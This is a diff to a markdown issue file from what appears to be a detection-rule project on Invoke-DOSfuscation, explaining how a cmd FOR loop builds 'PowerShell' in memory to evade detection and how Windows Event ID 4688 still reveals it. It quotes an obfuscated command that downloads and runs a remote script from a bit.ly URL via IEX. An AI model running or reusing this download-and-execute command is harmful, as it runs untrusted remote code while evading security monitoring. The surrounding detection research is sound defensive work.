zinint/OSCD_Invoke-DOSfuscation/OSCD - Issue - DOSfuscation.md

 #### For Loop

-It is possible to construct a binary name like `cmd` or `PowerShell` in memory that does not resolve on `cmd.exe`’scommand line upon execution, evading both static and dynamic detections focusing on the presence of these values.
-But in the last child Process Creation Windows Event Llog Security Event ID 4688 existing environment variables resolve to their underlying value.
+It is possible to construct a binary name like `cmd` or `PowerShell` in memory that does not resolve on `cmd.exe`’s command line upon execution, evading both static and dynamic detections focusing on the presence of these values.
+But in the last child Process Creation Windows Event Log Security Event ID 4688 existing environment variables resolve to their underlying value.
 E.g. if we'll use this example command:

 ```CMD
 cmd /c "FOR /F "delims=6M. tokens=2" %Z IN ('ftype^|findstr lMo')DO %Z IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')"